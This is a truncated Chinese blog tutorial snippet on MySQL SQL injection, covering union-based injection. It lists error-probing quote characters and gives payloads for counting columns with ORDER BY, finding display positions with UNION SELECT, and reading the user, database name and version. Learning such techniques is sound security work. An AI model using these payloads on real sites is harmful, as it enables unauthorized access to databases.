sql注入-mysql注入四种基本手法
union类型的sql注入(联合查询注入)
条件:
页面必须有显示位
实际操作
测出页面异常
‘ “ ) ‘) “) ‘)) “)) `
判断列数:
1’ order by 3-- -
不存在返回错误
判断显示位:
-1’ union select 1,2,3-- -
查看数据库:
-1’ union select user(),database(),version()-- -
查看数据库...
原创
2020-03-05 15:46:27 ·
1827 阅读 ·
0 评论